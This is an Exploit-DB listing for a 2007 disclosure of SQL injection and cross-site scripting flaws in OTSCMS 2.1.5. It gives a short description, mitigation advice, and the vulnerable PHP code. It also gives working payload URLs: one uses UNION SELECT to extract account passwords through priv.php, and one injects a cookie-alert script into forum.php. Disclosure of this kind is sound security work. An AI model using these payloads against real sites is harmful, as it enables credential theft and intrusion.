header-logo
Suggest Exploit
vendor:
OTSCMS
by:
GregStar (gregstar[at]c4f.pl)
7.5
CVSS
HIGH
Sql Injection / XSS
89
CWE
Product Name: OTSCMS
Affected Version From: OTSCMS 2.1.5
Affected Version To: OTSCMS 2.1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

OTSCMS 2.1.5 SQL Injection / XSS

This exploit allows an attacker to perform SQL injection and cross-site scripting (XSS) attacks on OTSCMS version 2.1.5. The vulnerability exists in the 'reply.php' file in the 'mod/PM' directory, specifically in lines 22-26. An attacker can exploit the SQL injection vulnerability by manipulating the 'id' parameter in the 'priv.php' file, allowing them to retrieve sensitive information from the database. The XSS vulnerability can be exploited by injecting malicious JavaScript code into the 'name' parameter in the 'forum.php' file.

Mitigation:

To mitigate the SQL injection vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries. To mitigate the XSS vulnerability, input validation and output encoding should be implemented.
Source

Exploit-DB raw data:

***************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
***************************************************************************************************************
													  		 
* Name = OTSCMS 2.1.5 by Wrzasq (http://otscms.com) ; 											
													  		 
* Class = Sql Injection / XSS  ;											
															 
* Download = http://sourceforge.net/project/showfiles.php?group_id=145557 ;				 			
													  		 
* Found by = GregStar (gregstar[at]c4f.pl) (http://c4f.pl) ;				          		 
												  	  		 
---------------------------------------------------------------------------------------------------------------
[SQL]	
												  		
Vulnerable Code in [path]/mod/PM/reply.php												
															 
line 22-26														
															 
...															 
															 
extract( $http->extract('id') );

// reads message
$pm = $db->query('SELECT [pms].`name` AS `name` [...]  ' AND [pms].`id` = ' . $id)->fetchAll(); <---
$pm = $pm[0];								
															 
...															 
	
Example :

http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts ;


----
[XSS]


http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>

# milw0rm.com [2007-02-07]